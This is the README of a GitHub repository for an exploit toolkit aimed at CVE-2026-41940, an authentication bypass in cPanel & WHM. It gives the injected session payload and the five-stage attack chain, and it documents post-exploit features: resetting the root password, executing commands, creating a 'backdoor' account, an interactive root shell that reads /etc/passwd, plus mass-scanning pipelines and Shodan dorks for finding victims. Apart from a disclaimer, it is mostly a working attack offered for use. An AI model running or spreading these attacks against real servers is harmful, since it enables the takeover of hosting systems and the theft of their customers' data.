sardine-web/Automated-scanner-CVE-2026-41940

# CPANEL CVE EXPLOIT

**English** | **[فارسی (Persian)](README.fa.md)** ██████╗██████╗ █████╗ ███╗ ██╗███████╗██╗ ██╔════╝██╔══██╗██╔══██╗████╗ ██║██╔════╝██║ ██║ ██████╔╝███████║██╔██╗ ██║█████╗ ██║ ██║ ██╔═══╝ ██╔══██║██║╚██╗██║██╔══╝ ██║ ╚██████╗██║ ██║ ██║██║ ╚████║███████╗███████╗ ╚═════╝╚═╝ ╚═╝ ╚═╝╚═╝ ╚═══╝╚══════╝╚══════╝ ██████╗██╗ ██╗███████╗ ██╔════╝██║ ██║██╔════╝ ██║ ██║ ██║█████╗ ██║ ╚██╗ ██╔╝██╔══╝ ╚██████╗ ╚████╔╝ ███████╗ ╚═════╝ ╚═══╝ ╚══════╝ ███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗ ██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝ █████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║ ██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║ ███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║ ╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ [](https://www.python.org/) [](https://nvd.nist.gov/) [](https://www.first.org/cvss/) [](LICENSE) [](requirements.txt) **Automated scanner & post-exploitation toolkit for CVE-2026-41940 — cPanel & WHM root authentication bypass via session-file CRLF injection.**

## Table of Contents - [Overview](#overview) - [CVE Details](#cve-details) - [How It Works](#how-it-works) - [Features](#features) - [Affected Versions](#affected-versions) - [Requirements](#requirements) - [Installation](#installation) - [Quick Start](#quick-start) - [Usage](#usage) - [Post-Exploit Actions](#post-exploit-actions) - [Interactive WHM Shell](#interactive-whm-shell) - [Mass Scanning & Pipeline Integration](#mass-scanning--pipeline-integration) - [Shodan Dorks](#shodan-dorks) - [Output Format](#output-format) - [Example Session](#example-session) - [Legal Disclaimer](#legal-disclaimer) ## Overview **CPANEL CVE EXPLOIT** is a single-file Python tool designed for **authorized security assessments** of cPanel & WHM servers vulnerable to **CVE-2026-41940**. The vulnerability allows an unauthenticated remote attacker to poison WHM session files through CRLF injection in the `Authorization: Basic` header, bypassing authentication and gaining **root-level WHM access** without valid credentials. | Property | Value | |----------|-------| | **CVE** | CVE-2026-41940 | | **Severity** | Critical | | **CVSS** | 10.0 | | **Attack Vector** | Network / Unauthenticated | | **Impact** | Full WHM root access | | **Default Port** | `2087` (WHM) | | **Status** | In-the-wild exploitation confirmed (Apr 2026) | ## CVE Details ### Root Cause In vulnerable versions of cPanel & WHM, `saveSession()` in `Session.pm` calls `filter_sessiondata()` **after** writing the session file to disk. An attacker can inject CRLF (`\r\n`) characters through the HTTP `Authorization: Basic` header, which gets written directly into the on-disk session file — bypassing sanitization. ### Injected Session Fields The tool uses a Base64-encoded payload that decodes to: root:x successful_internal_auth_with_timestamp=9999999999 user=root tfa_verified=1 hasroot=1 These fields simulate a fully authenticated root WHM session, including 2FA bypass (`tfa_verified=1`) and root privilege flag (`hasroot=1`). ### Fix cPanel moved `filter_sessiondata()` to execute **before** the session write operation in `Session.pm`. ## How It Works The exploit chain consists of **5 stages** (Stage 0–4): flowchart TD A[Stage 0: Canonical Host Discovery] --> B[Stage 1: Mint Preauth Session] B --> C[Stage 2: CRLF Injection via Authorization Header] C --> D[Stage 3: Session Propagation via do_token_denied] D --> E[Stage 4: Verify Root Access via json-api/version] E --> F{Vulnerable?} F -->|Yes| G[Post-Exploit Actions / Interactive Shell] F -->|No| H[Skip Target] A -.- A1["GET /openid_connect/cpanelid → 307 redirect reveals real hostname"] B -.- B1["POST /login/?login_only=1 → whostmgrsession cookie"] C -.- C1["GET / + poisoned Basic auth → /cpsessXXXXXXXXXX token"] D -.- D1["GET /scripts2/listaccts → flush raw session to cache"] E -.- E1["GET /cpsessXXX/json-api/version → HTTP 200 + version JSON"] | Stage | Endpoint | Purpose | |-------|----------|---------| | **0** | `/openid_connect/cpanelid` | Auto-discover canonical hostname via 307 redirect | | **1** | `/login/?login_only=1` | Obtain preauth `whostmgrsession` cookie with wrong credentials | | **2** | `/` | Inject CRLF-poisoned `Authorization: Basic` header into session file | | **3** | `/scripts2/listaccts` | Trigger `do_token_denied` gadget to flush session to cache | | **4** | `/{token}/json-api/version` | Confirm root access — HTTP 200 with version JSON | ## Features | Feature | Description | |---------|-------------| | **Single-target scan** | Full exploit chain against one WHM URL | | **Mass scanning** | Multi-threaded scanning from file or stdin | | **Version detection** | Automatic patched/vulnerable version comparison | | **Post-exploit API** | Password change, command exec, account listing, user creation | | **Interactive shell** | Built-in WHM root shell with file read & API commands | | **Selenium login** | Auto-inject session cookie into Chrome/Firefox | | **Manual browser fallback** | Console JavaScript snippets for manual WHM login | | **RCE check** | Quick `id` / `uname -a` verification after bypass | | **JSON export** | Save all findings to structured JSON report | | **Pipeline-ready** | Works with `httpx`, `subfinder`, `shodan`, and `awk` pipelines | | **Stdlib only** | No pip dependencies required for core functionality | | **Colorized output** | Real-time stage logging with severity indicators | ## Affected Versions | Branch | Patched At | Status | |--------|-----------|--------| | 11.110.x | `11.110.0.97` | Vulnerable below patch | | 11.118.x | `11.118.0.63` | Vulnerable below patch | | 11.126.x | `11.126.0.54` | Vulnerable below patch | | 11.132.x | `11.132.0.29` | Vulnerable below patch | | 11.134.x | `11.134.0.20` | Vulnerable below patch | | 11.136.x | `11.136.0.5` | Vulnerable below patch | ## Requirements ### Core (required) - **Python 3.8+** - No external packages — uses Python standard library only ### Optional | Package | Purpose | |---------|---------| | `selenium` | Browser auto-login (`--selenium`) | | Chrome / Firefox | Browser engine for Selenium | pip install -r requirements.txt # optional — selenium only ## Installation git clone https://github.com/YOUR_USERNAME/cpanel-cve-exploit.git cd cpanel-cve-exploit No build step required. Run directly: python3 test-cve.py --help ## Quick Start # Scan a single WHM target python3 test-cve.py -u https://target.com:2087 # Scan with post-exploit: list all cPanel accounts python3 test-cve.py -u https://target.com:2087 --action list # Mass scan from file, 20 threads, save JSON report python3 test-cve.py -l targets.txt -t 20 -o results.json ## Usage usage: test-cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME] [-t THREADS] [--timeout TIMEOUT] [--rate-limit RATE_LIMIT] [--action {list,passwd,cmd,exec,info,version,shell,adduser}] [--passwd PASSWD] [--cmd CMD] [--new-user NEW_USER] [--new-domain NEW_DOMAIN] [--read-file READ_FILE] [--selenium] [--engine {chrome,firefox}] [--browser] [--check-rce] [-o OUTPUT] [--no-color] ### Target Options | Flag | Description | |------|-------------| | `-u`, `--url` | Single target URL (e.g. `https://host:2087`) | | `-l`, `--list` | File containing URLs, one per line | | `--hostname` | Override canonical Host header (auto-discovered by default) | ### Scan Options | Flag | Default | Description | |------|---------|-------------| | `-t`, `--threads` | `10` | Number of concurrent scan threads | | `--timeout` | `15` | HTTP timeout in seconds | | `--rate-limit` | `0` | Delay (seconds) between target submissions | ### Output Options | Flag | Description | |------|-------------| | `-o`, `--output` | Save findings to JSON file | | `--no-color` | Disable ANSI color output | ## Post-Exploit Actions | Action | Flag | Description | |--------|------|-------------| | **Scan only** | *(default)* | Run exploit chain and report vulnerability | | **List accounts** | `--action list` | List all cPanel accounts via WHM API | | **Change password** | `--action passwd --passwd ` | Change root WHM password | | **Execute command** | `--action cmd --cmd "id;whoami"` | Run OS command via WHM exec API | | **Server info** | `--action info` | Gather hostname, load, disk, version | | **Get version** | `--action version` | Fetch cPanel/WHM version via API | | **Create account** | `--action adduser --new-user u --new-domain d.com --passwd p` | Create new cPanel account | | **Interactive shell** | `--action shell` | Launch interactive WHM root shell | | **RCE check** | `--check-rce` | Run `id;uname -a` after successful bypass | | **Selenium login** | `--selenium [--engine chrome\|firefox]` | Auto-login to WHM dashboard in browser | | **Manual browser** | `--browser` | Print JavaScript console commands for manual login | ### Examples # Change root password after bypass python3 test-cve.py -u https://target.com:2087 --action passwd --passwd 'P@ss2026!' # Execute remote command python3 test-cve.py -u https://target.com:2087 --action cmd --cmd "id;whoami;uname -a" # Create backdoor cPanel account python3 test-cve.py -u https://target.com:2087 \ --action adduser --new-user backdoor --new-domain evil.com --passwd 'TempPass2026!' # Open interactive WHM shell python3 test-cve.py -u https://target.com:2087 --action shell # Auto-login via Chrome python3 test-cve.py -u https://target.com:2087 --selenium --engine chrome # Manual browser login (prints JS for DevTools console) python3 test-cve.py -u https://target.com:2087 --browser ## Interactive WHM Shell Launch with `--action shell` for a full interactive session: root@target.com ▶ help id / whoami / hostname / version → server info ls [path] → file listing cat [path] → read file contents accounts → list cPanel accounts addadmin → create WHM admin/reseller passwd → change root password exec → run OS command exit / quit → exit shell **Example:** root@192.168.1.100 ▶ id uid=0(root) gid=0(root) groups=0(root) root@192.168.1.100 ▶ accounts user=webuser1 domain=example.com email=admin@example.com user=webuser2 domain=test.com email=info@test.com root@192.168.1.100 ▶ cat /etc/passwd root@192.168.1.100 ▶ exit ## Mass Scanning & Pipeline Integration ### From file python3 test-cve.py -l targets.txt -t 20 -o results.json ### From stdin (pipe) cat urls.txt | python3 test-cve.py # subfinder + httpx pipeline subfinder -d example.com -silent | httpx -p 2087 -silent | python3 test-cve.py -t 30 # Shodan pipeline shodan search --fields ip_str,port 'title:"WHM Login"' | \ awk '{print "https://"$1":"$2}' | python3 test-cve.py -t 30 -o shodan_results.json ### Supported input formats | Format | Example | |--------|---------| | Full URL | `https://192.168.1.1:2087` | | IP + port | `192.168.1.1 2087` | | Shodan output | Parsed automatically via regex | | ANSI-colored output | Stripped automatically | ## Shodan Dorks title:"WHM Login" title:"WebHost Manager" port:2087 product:"cPanel" port:2087 http.title:"WHM" ssl:"cpanel" port:2087 ## Output Format Findings are saved as JSON when using `-o results.json`: { "scanner": "cPanelSniper v2.0", "cve": "CVE-2026-41940", "timestamp": "2026-05-23T12:00:00.000000", "findings": [ { "severity": "CRIT", "title": "CVE-2026-41940 — cPanel & WHM Authentication Bypass", "target": "https://target.com:2087", "canonical": "server.target.com", "session": "root:SessionName", "token": "/cpsess1234567890", "version": "11.126.0.50", "api_url": "https://target.com:2087/cpsess1234567890/json-api/version", "evidence": "{\"version\":\"11.126.0.50\"...}", "cve": "CVE-2026-41940", "cvss": "10.0", "timestamp": "2026-05-23T12:00:05.000000" } ] } ### Console summary ══════════════════════════════════════════════════════════════════════ cPanelSniper — CVE-2026-41940 Scan Complete Time: 12.4s · Targets: 50 ────────────────────────────────────────────────────────────────────── ⚡ 2 VULNERABLE TARGET(S) Target : https://victim1.com:2087 Version : 11.126.0.50 Token : /cpsess1234567890 API URL : https://victim1.com:2087/cpsess1234567890/json-api/version Evidence : {"version":"11.126.0.50"...} ══════════════════════════════════════════════════════════════════════ ## Example Session $ python3 test-cve.py -u https://target.com:2087 Configuration: Targets : 1 Threads : 10 Timeout : 15s Action : scan only 12:00:01 [INFO] Canonical hostname discovered: server.target.com 12:00:02 [ OK] Stage1: preauth session = root:abc123... 12:00:03 [ OK] Stage2: HTTP 307 → token=/cpsess1234567890 12:00:04 [ OK] Stage3: HTTP 401 — do_token_denied gadget fired 12:00:05 [INFO] Stage4: HTTP 200 {"version":"11.126.0.50"...} 12:00:05 [PWND] CVE-2026-41940 CONFIRMED — WHM root access! (v11.126.0.50 — CONFIRMED vulnerable) 12:00:05 [PWND] Token : /cpsess1234567890 12:00:05 [PWND] Session : root:abc123... 12:00:05 [PWND] Version : 11.126.0.50 12:00:05 [PWND] API URL : https://target.com:2087/cpsess1234567890/json-api/version ## Project Structure cpanel-cve-exploit/ ├── test-cve.py # Main scanner & exploit tool (single file) ├── requirements.txt # Optional: selenium ├── README.md # English documentation └── README.fa.md # Persian documentation (فارسی) ## Legal Disclaimer This tool is provided for **educational and authorized penetration testing purposes only**. - Only use against systems you **own** or have **explicit written permission** to test. - Unauthorized access to computer systems is **illegal** under laws including the CFAA (US), Computer Misuse Act (UK), and equivalent legislation worldwide. - In-the-wild exploitation of CVE-2026-41940 has been confirmed — patch affected systems immediately. - The authors and contributors **accept no liability** for misuse of this software. By using this tool, you agree to use it responsibly and in compliance with all applicable laws. ## References - [CVE-2026-41940](https://nvd.nist.gov/) — NVD Entry - cPanel Security Advisory — Session.pm CRLF injection patch - WHM default port: `2087` (HTTPS)

_{Built for security researchers · Use responsibly}